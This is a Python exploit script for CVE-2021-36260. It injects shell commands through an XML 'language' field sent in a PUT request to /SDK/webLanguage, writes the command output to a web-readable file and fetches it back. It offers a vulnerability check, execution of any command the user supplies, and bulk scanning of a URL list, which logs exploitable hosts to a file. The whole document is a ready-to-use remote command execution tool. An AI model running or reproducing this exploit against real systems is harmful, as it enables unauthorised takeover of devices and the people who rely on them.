# -*- coding: utf-8 -*-

import argparse
import time
import requests
from pyfiglet import Figlet

def check_host(host):
    if not host.startswith("http"):
        print('\033[1;31m[x] ERROR: Host "{}" should start with http or https\n\033[0m'.format(host))
        return False
    else:
        return True

def Req(url,command='>webLib/cu'):
    try:
        url = url.split('//')[1]
        host = url.split(':')[0]
        port = url.split(':')[1]
        headers = {
            "host": f'{host}:{port}',
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8'
        }
        data = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({command})</language>'
        print(data)
        resp1 = requests.put(url=url+'/SDK/webLanguage', headers=headers, data=data, timeout=3,verify=False)
        resp2 = requests.get(url+'/cu')
        return resp2

    except Exception as e:
        print(e)


def check(url):
    resp = Req(url)
    if resp.status_code == 200:
        print(f'[!] {url} is verified exploitable')
        return True
    else:
        print(f'[-] Could not verify {url} if vulnerable (Code: {resp.status_code})')
        return False


def cmd(url,cmd):
    resp = Req(url,command=cmd+'>webLib/cu')
    if resp is None or resp.status_code != 200:
        print(f'[!] Error execute cmd "{cmd}"')
    print(resp.text)
    pass

def main():
    f = Figlet(width=2000)
    print(f.renderText("Cuerz"))

    parser = argparse.ArgumentParser(description='CVE-2021-36260')
    print('Example: CVE-2021-36260.py -u http://192.168.1.1:8080 --check')

    parser.add_argument("-u", "--url", help='Start scanning url')
    parser.add_argument("-f", "--file", help='read the url from the file')
    parser.add_argument("--check", required=False, default=False, action='store_true',help='Check if vulnerable')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    args = parser.parse_args()

    if args.url and check_host(args.url):
        if args.check:
            check(args.url)
        elif args.cmd:
            cmd(args.url,args.cmd)

    elif args.file:
        f = open(args.file,"r")
        all = f.readlines()
        for i in all:
            url = i.strip()
            if check_host(url):
                if check(url):
                    with open('Exist.txt', 'a+') as fp:
                        fp.write(url + '\n')
            time.sleep(0.2)



if __name__ == '__main__':
    main()
